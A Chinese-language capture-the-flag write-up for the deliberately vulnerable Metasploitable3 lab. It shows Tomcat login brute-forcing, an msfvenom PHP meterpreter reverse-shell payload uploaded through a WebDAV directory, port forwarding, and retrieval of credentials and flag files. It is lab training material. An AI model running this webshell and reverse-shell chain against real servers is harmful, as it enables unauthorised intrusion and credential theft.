Metasploitable3-Jack of Clubs 第九个flag

 

这是第九个flag.
首先从nmap扫描中我们可以得出以下信息
8282/tcp open http Apache Tomcat/Coyote JSP engine 1.1
http-favicon: Apache Tomcat
http-server-header: Apache-Coyote/1.1
http-title: Apache Tomcat/8.0.33

Tomcat是Apache 软件基金会(Apache Software Foundation)的Jakarta 项目中的一个核心项目,由Apache、Sun 和其他一些公司及个人共同开发而成。由于有了Sun 的参与和支持,最新的Servlet 和JSP 规范总是能在Tomcat 中得到体现,Tomcat 5支持最新的Servlet 2.4 和JSP 2.0 规范。因为Tomcat 技术先进、性能稳定,而且免费,因而深受Java 爱好者的喜爱并得到了部分软件开发商的认可,成为目前比较流行的Web 应用服务器。

因为它对应http服务,所以先用浏览器访问一下

Metasploitable3-Jack of Clubs 第九个flag_第1张图片
看见manager app,点一下,弹出一个窗口让你输入用户名和密码,这让我很容易地就联想到爆破
Metasploitable3-Jack of Clubs 第九个flag_第2张图片

爆破可以用burpsuite,也可以用msf里面对应的tomcat模块
我这里就用msf爆破
search tomcat

设置相关参数
Metasploitable3-Jack of Clubs 第九个flag_第3张图片

爆破,可惜没能成功,我尝试从别的地方出发

我记得前面8585的端口那里有个上传目录,我准备从那里下手,

先生成一个webshell
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.0.108 LPORT=4444 -f raw>davtest.php

用cadaver上传上去并运行,拿到shell
Metasploitable3-Jack of Clubs 第九个flag_第4张图片
现在马上去tomcat的目录查看相关密码

没有权限,
meterpreter里面自带有一个portfwd命令,它的功能是端口转发
Metasploitable3-Jack of Clubs 第九个flag_第5张图片
设置好相关参数
成功连接
Metasploitable3-Jack of Clubs 第九个flag_第6张图片
现在去找tomcat密码
Metasploitable3-Jack of Clubs 第九个flag_第7张图片

得到相关密码为sploit

直接找flag把
Metasploitable3-Jack of Clubs 第九个flag_第8张图片
双击打开
另外我找到flag的路径
C:\vagrant\resources\flags
在meterpreter上把它们全部下载下来
这一次要把它们一锅端了
Metasploitable3-Jack of Clubs 第九个flag_第9张图片
先看看jack_of_club
Metasploitable3-Jack of Clubs 第九个flag_第10张图片
直接是png大功告成了,本篇就完结吧,剩下的那些我在下篇说。

你可能感兴趣的:(安全)